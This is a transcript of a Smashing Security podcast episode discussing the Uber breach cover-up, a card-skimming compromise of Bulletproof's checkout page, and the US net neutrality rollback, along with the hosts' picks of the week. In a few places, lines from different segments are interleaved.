What is a hamburger? A hamburger is different from a beef burger, right? Because ham comes from pigs.

Yeah, that's not where the name comes from. It's Hamburg, the place.

Oh, really?

Yeah.

And it's nothing to do with Hamburglers? No. Smashing Security, Episode 55: Uber, Net Neutrality, and Website Hacks with Carole Theriault and Graham Cluley. Hello, hello, and welcome to another episode of Smashing Security, episode 55, for the 30th of November, 2017. I'm Graham Cluley.

And I'm Carole Theriault.

And once again, we are going to dive into the murky waters of cybersecurity. But hey, Carole, in the last regular episode, we missed a big story, didn't we?

Oh yeah, we did.

Uber's farcical data breach incident, 57 million account users found that they had been compromised by a hack. A hack which is said to have happened back in October 2016, but has only been made public a year later. Not because Uber didn't know about it, but because Uber covered it up.

I know, it's so shameful. I think you should just tell the story, just give the highlights of how it actually happened from what you've pieced together so far, because it's just fascinating.

It seems that Uber found out October 2016 that they'd been hacked and these attackers had accessed a GitHub coding site used by some Uber engineers. They'd stolen credentials, which they grabbed from there to access an Amazon Web Services account where Uber had other information. And via that, the hackers were able to make off with all this information. So far, so normal for a data breach. But of course, this is Uber, which I don't know if you've ever traveled by Uber, but I found them— I have. Yeah, it's really convenient, right? It's a great app. And you think, wow, this is amazing. I'm in a taxi. Woo-hoo. Working, but by all accounts, not that great a company.

Totally loved giving them my credit card details as well. Loved that bit.

In some ways similar to Amazon, right? Where you get a fantastic service, but there are reports that maybe they're not a terrific company.

Reports. There's been like, they've not stopped being in the news for the last at least 6 months.

Well, here's the interesting thing. So they discovered this data breach had occurred. And it appears that Uber covered it up. Their security team, which was led at the time by Joe Sullivan—

Someone that we've had a few encounters with.

We've had a couple of run-ins with Joe in our past. Yeah.

Hi, Joe, if you're listening.

Well, I doubt it. When we've written about Facebook security issues. Well, he moved on to Uber and he was spearheading the company's response to the breach by giving the attackers $100,000 in the form of a bug bounty in order to keep the breach quiet. And please don't do anything with the data.

It's shut the fuck up money, right?

That's exactly right. And they didn't inform anyone, didn't inform the users, didn't inform the authorities who were already investigating Uber for a number of other reasons.

No one will ever know.

Well, unfortunately, the new CEO who came in in September this year just found out about it last week and kicked Joe and one of Joe's buddies out of Uber and said, "You're no longer running security because we can't trust you." And said that this was reprehensible, which I think it was, quite frankly. I think it's not so much the paying of the hackers because that does happen. Of course, hackers do try and extort money out of businesses and sometimes it can be pragmatic, maybe to pay the hackers, that's one whole debate. What I think is outrageous is not telling those users, not coming clean and saying we've had a security incident and trying to sweep it under the carpet.

It is quite cool that the new CEO has basically, you feel like she's lifted up a bit of furniture and found this hornet's nest.

I know their name is Dara, but I've got a feeling it's a chap. I'll just Google Image and try and work it out. Oh yes, Dara has got a beard. Okay, yes, Dara is a man.

Anyway, so I'm going to say that again. So I think it's good that at least the new CEO has come in and, you know, however opened a drawer and found this hornet's nest and is coming clean, even though it's going to hurt the reputation. It's not good for Uber as a company.

What reputation? Uber has got an appalling reputation as it is already. This is the only sensible course of action it can take because if any more cans of worms like this are discovered, it's gonna be the death of this. Well, would it though? I wonder if, I mean, you know, I have to ask myself, would I not use Uber after this?

Yeah, this is the thing, right? You're gonna say in your head, "Well, I already have an account with Uber. And they already have my credit card details, and I'm gonna trust they're doing everything right with that. So I'm just gonna carry on using the service 'cause it's so useful when I land at some airport in the middle of the night and there's no, you know." And I think that's actually the case with most of the hacks we hear about. Everyone gets really upset for a week or two, but who actually closes their accounts? And convenience often wins over security, doesn't it? I think I have had it once, but I don't even actually remember what my impression was of it, so maybe I never have had it.

Well, Bulletproof claims to do wonders to your brain and help you lose weight.

Yeah, I've read about it. I've totally read about it. I just think this is all a pile of garbage, but yes.

It sounds awfully trendy and funky. And when you read up about it, the chap who founded the company, a guy called Dave Asprey, he claims to have spent two decades and over $1 million biohacking himself. I think a biological hack is basically going on a diet. But he claims that you can help — you can also similarly upgrade your brain like he lifted his IQ by 20 points, he says, and lower your biological age and learn to sleep more efficiently by drinking his coffee.

Ah, blah, blah, blah, blah. Snake oil. Well, perhaps.

In your humble opinion.

Potentially.

Not the opinion of the podcast. Well, Bulletproof unfortunately has suffered a security incident. They've been sending letters to some of their customers, and they say that they identified in the middle of last month that unauthorized computer code had been added to their website on the page which operates their checkout, where you buy all your beans and ingredients to buy this mega coffee.

Right, right.

And that means that the bad guys have got your bank card numbers, your expiry dates, your security codes, your names, your postal addresses, and your email addresses. And this was going on from May 20th to October 19th.

Shut the front door! That's — is that 6 months?

5 months, I think. Yeah. Apart from one day, October 14th, apparently according to the letter, weren't being grabbed. Now, what on earth is that about? Is that because their website was down? I don't understand. But apparently October 14th, you're safe. The other days, you've got a problem.

Weird.

I can't begin to understand why that was.

Yeah. But clearly, you know, something seriously and badly went wrong, although I could find no mention of this on Bulletproof's own website. So you have to wait until your letter comes through to tell you if you've got a problem with this or not. You know, there's a lot of people out there with websites that they may hire a third party to create the website and make it secure as they can at that stage, but then they don't maintain it and they don't keep someone that knows their stuff. They just think, oh, I can update a plugin or I can, you know, just do a few little things and things get out of date or things can be broken like this and there's no one there to spot this stuff.

Yeah. And they really should probably have spotted that code had been changed on their website for that length of time, particularly on such a critical part of their website where compromise is basically disastrous, isn't it? Right. Well, they said they're going to reimburse affected customers for any reasonable documented costs if your bank refused to pay you back.

And of course, they're full of regret and apologies for— You need to go out now and change your credit

It sounds like the kind of thing which could be good for big businesses and for the telecoms companies, because it's another way to screw more money

card details, change your credit card number.

out of you, but a bad thing for the typical individual, really, isn't it? I mean, it's just going to end up with the internet costing you Well, yeah, I mean, normally your expiry date is a couple of years in advance, isn't it? So the bad guys have got a couple of years to take advantage of it unless you change your number. Obviously, always makes sense. more, or you being a second-class citizen because you can't access certain sites or use certain web services.

Well, over last weekend, this was Thanksgiving holiday in the US, the FCC decided to release, well, some would say sneak out, the final draft of its net neutrality proposal. This is the order to roll back the 2015 net neutrality protections that the Obama administration put in place. This rollback means that internet providers like Verizon and Comcast and AT&T will be able to block content. So this is online services, apps, and websites. And they can also throttle internet services, basically artificially slowing speeds and fast-lane those that pay more. So, you know, imagine, for example, you snuggle down to binge some Netflix only to find that your ISP has made it unwatchable just by throttling the bandwidth.

Yeah. Eek.

In order to encourage you to move to a more expensive plan, for example. Or imagine you can't access Facebook or other internet services, or you only have a set number of hours each month.

So the scenario might be that when you buy your internet package, you would have to tick the box saying, oh yes, I'd like to be able to watch Netflix, or I'd like it to be speedier in some fashion, or give me access to these bits of the internet. Otherwise, you go for a cheap option where you sort of get a second-class internet.

That's what everyone is worrying about, exactly. But it goes worse than that. Imagine also maybe a sensitive political brouhaha is gaining steam and the ISP decides to block information on the topic or just provide you with a single point of view. So—

The good news, Carole, is there are no political brouhahas.

Exactly.

At the moment. Things have got really, really soft.

It's tickety-boo out there. Smooth sailing. Yeah, I don't want him.

Yeah, exactly.

Yuck. Get your hands off me. Now, worse than that, any state-level regulations that contradict the FCC's order— the one that they have in proposal right now would be preempted. So in other words, you can't rely on local legislation to protect you. So according to The Verge, there's only one rule left here that ISPs have to publicly disclose when they're doing these things. So I guess I might say that on the plus side, you're always going to know when you're getting fucked. I'm just trying to shock you a little bit, wake you up, you know? Come on, I've sworn twice now. Now, the FCC gave the public just 3 weeks to send feedback before the vote's going to be put up and the final decision is going to be made. Now, the question is, why would the FCC reveal this over a holiday weekend? You know, they're probably hoping that Americans are too busy stuffing their faces with sweet potato and marshmallow and turkey and all the things that they eat.

What's your favorite Dickens book, Carole? Well, all at the same time.

At exactly the same time.

Sweet potato with marshmallow and turkey.

No, no, no, not turkey. So sweet potato and marshmallow is definitely a dish.

Really? Yes. I've also been fed something that was horseradish and lime Jell-O as a side dish to turkey. I'm not kidding. They should have taken heed.

They should have taken heed. The internet scrambled into action. And as Slate puts it, "If you're concerned about the fact that the internet could be a very different place in less than two months, now is a very good time to rabble-rouse." So there's a few things going on right now. One is battleforthenet.com. This is—we've talked about these guys before in an earlier podcast, but this is a site that's dedicated to saving net neutrality. And they've registered already 500,000 calls to Congress on this issue. And protests to oppose this draft are being organized outside Verizon stores across the country. And these are going to take place on December 7th. Free Press Action Fund has set up a team internet, #TeamInternet. There's a dozen new petitions to fight net neutrality on change.org. Reddit is just slammed with people calling for action. And Reddit is actually, there's a really good—I'm gonna put this in the show notes—there's a really moving post actually by Reddit to the community and it's a great read. So all these things are going on. So those people that wanna get involved, there are things that you can do. What not to do, however, and this is based on a segment on Fox News. So some activists have been going to Ajit Pai's home in suburban Virginia with signs directed at his children.

And Ajit Pai is the chap at the FCC.

He's the chairman of the FCC.

Yes.

Yes. So these signs are saying things like, "They will come to know the truth. Dad murdered democracy in cold blood." That's pretty harsh. So on this, I agree with Pai. Families should just remain out of it. Don't harass people at home. I think they should be completely left out of it. Now, the fact that Donald Trump appointed Ajit Pai to be FCC chairman, and one refers to net neutrality as "Obama's net neutrality," seems to kind of have radically politicized this whole issue. And from an outside point of view, I really urge people to ignore the politics here. This is more about deregulating a service that many see as the backbone of everything—of innovation, of communication, of technology, a free and open internet. Yes, or maybe you're offering a brand new service, or you're a non-for-profit, or you're a school. And if they don't have the cash in their back pocket to pay for that super slick highway. So I say, if you agree—if you think net neutrality is a good thing, you should go and do something about it. And I don't want it to wither and die. I don't want it to be censored. And there's loads of links in the show notes here. But if you don't, I expect you have your own good reasons, and they're simply beyond me.

But I guess— so I guess our message is just because our Lord and Savior Barack Obama thought net neutrality was a good idea shouldn't mean that people who don't like Barack Obama think that net neutrality is a bad idea.

Can I just share a factoid with you?

Yes, please.

How did net neutrality start? It's always been called the Obama thing, but actually it first started under Michael Powell, who was a Republican-appointed chairman at the FCC. And what happened was in 2005, a small phone company based in North Carolina basically began preventing its subscribers from making phone calls using that internet application Vonage because Vonage was a competitor in the phone call market. This action was obviously anti-competitive. So consumers complained and the FCC promptly fined the company and forced it to stop blocking Vonage.

Kroll, you are such a font of information.

A font of information.

Well, I think that's what you say, isn't it? Font?

It is. It is. I was—

Have I done well?

I was impressed with you knowing that word.

I don't mean font like Helvetica.

Calibri.

Tahoma.

Now, it's a very important time now because we're going to hear from our sponsors, aren't we? Yay! Are you worried that your website might be the backdoor through which hackers can access your information and steal data? Pick of the Week. Everyone on the show chooses something they like. Could be a funny story, a book they've read, a TV show, a movie, a record, an app, a website, a podcast, whatever you like. Good, because it shouldn't be, right?

It is instead handy because you watch a lot of YouTube videos, right, Kroll?

Yeah, I've been known to peruse the YouTube.

Yeah, right. Well, there are YouTube secret keyboard shortcuts. I don't know if you knew about these. So rather than grabbing your mouse, you can just quickly flick a finger and pause a video by pressing the K button.

Well, sorry, the spacebar works to pause a video, you know.

Okay, yes, you can use space as well. But listen, listen, fast forward with L, rewind with J, or you can watch frame by frame, forwards or backwards, by pressing the dot or comma key.

Okay, okay, that's pretty cool. I didn't know that.

Pretty funky stuff. So you can just move forward. You can mute or unmute by pressing M. You can turn captions on and off by pressing C. It's actually kind of handy. Yeah, it's pretty neat. So that is my pick of the week.

I'm surprised by your pick of the week because I was convinced you were going to talk about something else. Here, let me get the link for you. Let me get the link for you. Okay, there you go. Click on that and tell me if you read about this and then tell me why, if you have, why it's not interesting and why it wasn't your pick of the week.

Okay, so you have sent me a link about Thom Baker. Oh, I love Thom Baker. Thom Baker was the fourth Doctor Who, back in the '70s. And the reason why Thom Baker's in the news this week— I don't like to talk too much about Doctor Who because this could become the Doctor Who podcast.

No, it will not. Over my dead body.

So in 1979, I think we may have mentioned actually in a past show, there was a scrapped episode of Doctor Who. They half filmed it. It was called Shada, written by Douglas Adams, and it was never completed.

Stop showing off!

It's just basic Doctor Who knowledge. And what the BBC have done is they have released a version where they've animated the missing parts of the story. And right at the very end, apparently— spoilers— of the show, they have some live footage of Thom Baker, who's now about 83 years old, in his Doctor Who costume in the TARDIS. They actually filmed it on a grubby old videotape studio with the old console and everything, so it looks like the real thing. Him there with his shock of white hair now, of course, and he's got a few lines and it's rather gorgeous. And— oh, sorry, I fell asleep. Hey, you were the one who thought this should be my pick of the week!

Yeah, I didn't mean— Do you have a second pick of the week?

Well, no, I'm not saying it's a week, but you were just pointing me at it. But yeah, I do love Thom Baker. I think he's mad as a box of frogs.

Well, makes two of you.

But yeah, I've never actually been a fan of Shada, to be honest. I don't think it's Doctor Who's finest.

I have no idea what you're even talking about. I just saw Thom Baker and Doctor Who in the headline, and that was it. Yeah, it was about as deep as that. So my pick of the week this week is an interview show and podcast called The Rubin Report, and specifically its most recent episode, which is on bitcoin. So The Rubin Report, if you're unaware, is a political talk show that airs on YouTube and it's hosted by Dave Rubin. And it is actually also a podcast. That's where I first heard about it. And I've listened to a few shows and think it's quite a cool little podcast where Rubin interviews some amazing person, an author, an activist, a journalist, comedian, professors, actors, et cetera. The latest one is called Bitcoin: How Does It Work? The interviewee is a first investor in Bitcoin.com and Blockchain.com, and he's by name of Roger Ver. And it's a really good overview to help you understand the bitcoin cryptocurrency's ins and outs. And it's about an hour long, and it's a really good show to keep in your back pocket over the holidays if your in-laws or someone starts asking you to explain what all this bitcoin stuff is. Because you can send them just the link to the YouTube, or if they're podcast listeners, you can send it to them.

Or you can pretend to be an expert yourself. You listen to it and then hopefully pass on the wisdom. So what do you think of Bitcoin? Are you— because bitcoin price, they've been zooming up.

$10,000 I read today.

It's astonishing.

Yeah. So early investors obviously are laughing all their way to the bank. So it's no surprise that this person, Roger Ver, is obviously going to be touting the joys of bitcoin and blockchain, right? Because he certainly has money to make out of it, but he makes a lot of good points. You know, they're all in the press about how much money is going to be made, you are going to be asked about it, right? So may as well have an easy answer to explain because what if your parents want to start investing in it, right?

The bitcoin bubble has got to burst soon though, surely, hasn't it?

Loads of people are saying that. I don't know how anyone would predict one way or the other.

Just seems to be so cheap.

But it hasn't been going— people have been saying that for about 5 years.

Right. You know what? We should do an episode sometime all about blockchain.

I agree. I think we've said that a few episodes ago. I agree.

Yeah. My brother has been hassling me saying, when are you going to talk about blockchain?

Does he really talk like that? Jeez.

Poor guy.

I haven't seen him in a while, so.

Well, thank you very much, Carole, for that pick of the week. We've got a guest lined up for next week. That's fun, isn't it? Yeah.

We have a special surprise for our year-end show, don't we?

Yes, we do.

Yep. No, no, no. Just saying. Just saying.

Yeah, we've got some surprises in store, so make sure that you subscribe to the podcast in Apple iTunes or your favorite podcast app so that you don't miss any future episodes. If you want to follow us on Twitter, we're @SmashingSecurity without a G. And we're also on Facebook. Look for the Smashing Security group up there. And we've got swag as well. You can buy not just t-shirts, you can buy mugs and you can buy cushions.

Very ginormous cushions you can buy, can't you, Graham? Well, and give them to your friend as a birthday present.

It's pretty cool though, isn't it? I saw a photo of you and you seem to be enjoying it. Go to smashingsecurity.com/store. That just about wraps it up. All that remains is to say thank you for tuning in. If you know someone else who might the show, please tell them about it. Until next time, cheerio, bye-bye.

Later, guys. Goodbye.

I'm going to press stop. Do you know what?

At this stage, I think George Bush is my lord and savior as well.

Which one? The one—

I don't mind.

The one with the groping hands?

Compared to what's going on right now. Oh no, no, God, you can't say that. He was involved with the harassment stuff.

Yes, that's it.

I was talking, I didn't hear you.